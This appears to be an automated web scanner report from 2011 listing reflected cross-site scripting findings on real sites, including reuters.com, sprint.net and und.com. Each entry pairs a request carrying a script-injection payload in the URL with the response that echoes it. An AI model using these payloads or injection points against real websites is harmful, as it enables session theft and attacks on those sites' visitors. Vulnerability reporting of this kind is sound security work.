HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:47:47 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 4901 <!--[if !IE]> This has NOT been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: S264630NJ2XSF01 <![endif]--> <!--[if !IE]> token: 3d278813-504e-4191-9b77 ...[SNIP]... <input type="hidden" name="article_id" value="USTRE78222D20 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.reuters.com |
Path: | /assets/commentsChild |
GET /assets/commentsChild Host: www.reuters.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:48:10 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 5218 <!--[if !IE]> This has NOT been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: S264630NJ2XSF38 <![endif]--> <!--[if !IE]> token: 0fe4c1fd-5429-477a-8e92 ...[SNIP]... <input type="hidden" name="channel" value="domesticNewsf1018"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.reuters.com |
Path: | /assets/searchIntercept |
GET /assets/searchIntercept Host: www.reuters.com Proxy-Connection: keep-alive Referer: http://www.reuters.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie; __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:00:17 GMT Server: Apache-Coyote/1.1 Expires: Sun, 4 Sep 2011 01:00:18 GMT Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 572 <!--[if !IE]> This has NOT been served from cache <![endif]--> <!--[if !IE]> Request served from apache server: S264630NJ2XSF14 <![endif]--> <!--[if !IE]> token: a723f467-3f78-4872-b9c9 ...[SNIP]... <div class="searchTerm">"notre dame footballf02e5<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.reuters.com |
Path: | /tracker/guid |
GET /tracker/guid?cb Host: www.reuters.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: tns=dataSource=cookie |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 00:46:33 GMT Server: Apache-Coyote/1.1 Cache-Control: no-cache Content-Type: text/javascript Content-Length: 150 typeof doTrack8497ce90a;alert(1)/ |
Severity: | High |
Confidence: | Certain |
Host: | https://www.sprint.net |
Path: | / |
GET /?9afcf"><script>alert(1)< Host: www.sprint.net Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Set-Cookie: ServerID=1125; path=/ Date: Sun, 04 Sep 2011 01:01:59 GMT Server: Apache/2.2.4 (Unix) Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 16888 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <input type="hidden" name="request_uri" value="/?9afcf"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.sprint.net |
Path: | /external_videos/pages |
GET /external_videosd5e94"><script>alert(1)< Host: www.sprint.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Set-Cookie: ServerID=1125; path=/ Date: Sun, 04 Sep 2011 01:28:13 GMT Server: Apache/2.2.4 (Unix) Connection: close Content-Type: text/html Content-Length: 9557 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <input type="hidden" name="request_uri" value="/external_videosd5e94"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.sprint.net |
Path: | /external_videos/pages |
GET /external_videos/pages Host: www.sprint.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Set-Cookie: ServerID=1125; path=/ Date: Sun, 04 Sep 2011 01:28:22 GMT Server: Apache/2.2.4 (Unix) Connection: close Content-Type: text/html Content-Length: 9557 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <input type="hidden" name="request_uri" value="/external_videos ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.sprint.net |
Path: | /index.php |
GET /index.php4efbd"><script>alert(1)< Host: www.sprint.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Set-Cookie: ServerID=1125; path=/ Date: Sun, 04 Sep 2011 01:28:14 GMT Server: Apache/2.2.4 (Unix) Connection: close Content-Type: text/html Content-Length: 9541 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <input type="hidden" name="request_uri" value="/index.php4efbd"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.sprint.net |
Path: | /index.php |
GET /index.php?4a007"><script>alert(1)< Host: www.sprint.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Set-Cookie: ServerID=1125; path=/ Date: Sun, 04 Sep 2011 01:28:03 GMT Server: Apache/2.2.4 (Unix) Connection: close Content-Type: text/html Content-Length: 16897 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <input type="hidden" name="request_uri" value="/index.php?4a007"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.sprint.net |
Path: | /min/ |
GET /mine0b69"><script>alert(1)< Host: www.sprint.net Connection: keep-alive Referer: https://www.sprint.net/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ServerID=1125 |
HTTP/1.1 404 Not Found Set-Cookie: ServerID=1125; path=/ Date: Sun, 04 Sep 2011 01:03:12 GMT Server: Apache/2.2.4 (Unix) Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Content-Length: 9641 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> ...[SNIP]... <input type="hidden" name="request_uri" value="/mine0b69"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /allaccess/ |
GET /allaccesse9585"><script>alert(1)< Host: www.und.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 01:27:58 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 33967 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /favicon.ico |
GET /favicon.ico534b1"><script>alert(1)< Accept: */* Accept-Encoding: gzip User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com Host: www.und.com Proxy-Connection: Keep-Alive |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:44:48 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 33978 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /gametracker/launch/ |
GET /gametracker71bd4"><script>alert(1)< Host: www.und.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 01:28:54 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 34007 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /gametracker/launch/ |
GET /gametracker/launched840"><script>alert(1)< Host: www.und.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 01:28:55 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 34007 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /nd.ico |
GET /nd.ico589ca"><script>alert(1)< Host: www.und.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: LDCLGFbrowser=1502b25b |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:54:32 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 33958 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /photogallery/ |
GET /photogallery141e8"><script>alert(1)< Host: www.und.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 01:27:59 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 33983 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/9873956 |
GET /sports11ba5"><script>alert(1)< Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:45:49 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34027 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/9873956 |
GET /sports/m-footblf60b2"><script>alert(1)< Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:45:49 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34116 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/9873956 |
GET /sports/m-footbl/987395630b6e"><script>alert(1)< Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:44:54 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34048 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/9873956 |
GET /sports/m-footbl/9873956?99832"><script>alert(1)< Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:45:48 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 33922 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/9874134 |
GET /sportsd0614"><script>alert(1)< Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: LDCLGFbrowser=1502b25b |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 01:01:11 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34027 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/9874134 |
GET /sports/m-footbl34139"><script>alert(1)< Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: LDCLGFbrowser=1502b25b |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 01:01:12 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34116 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/9874134 |
GET /sports/m-footbl/9874134984d1"><script>alert(1)< Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: LDCLGFbrowser=1502b25b |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 01:01:14 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34048 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/9874134 |
GET /sports/m-footbl/9874134?88998"><script>alert(1)< Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: LDCLGFbrowser=1502b25b |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 01:01:10 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 33922 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/grfx |
GET /sports%00172bf"><script>alert(1 Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:44:45 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34172 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/grfx |
GET /sports/m-footbl%00a3fe9"><script>alert(1 Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:44:46 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34274 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/grfx |
GET /sports/m-footbl/grfx Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:45:35 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34193 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/grfx |
GET /sports/m-footbl/grfx Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:45:35 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/grfx |
GET /sports/m-footbl/grfx Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:44:46 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34208 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/grfx |
GET /sports/m-footbl/grfx Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:45:38 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34193 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/grfx |
GET /sports/m-footbl/grfx Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.und.com/sports User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:44:47 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34141 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/nd-m |
GET /sportse33e1"><script>alert(1)< Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:44:42 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34017 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/nd-m |
GET /sports/m-footbl52f3e"><script>alert(1)< Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:44:43 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34106 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.und.com |
Path: | /sports/m-footbl/nd-m |
GET /sports/m-footbl/nd-m Host: www.und.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 00:44:43 GMT Server: Apache P3P: policyref="http://www Connection: close Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 34307 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="javascript:window ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.careerbuilder |
Path: | / |
GET / HTTP/1.1 Host: www.careerbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
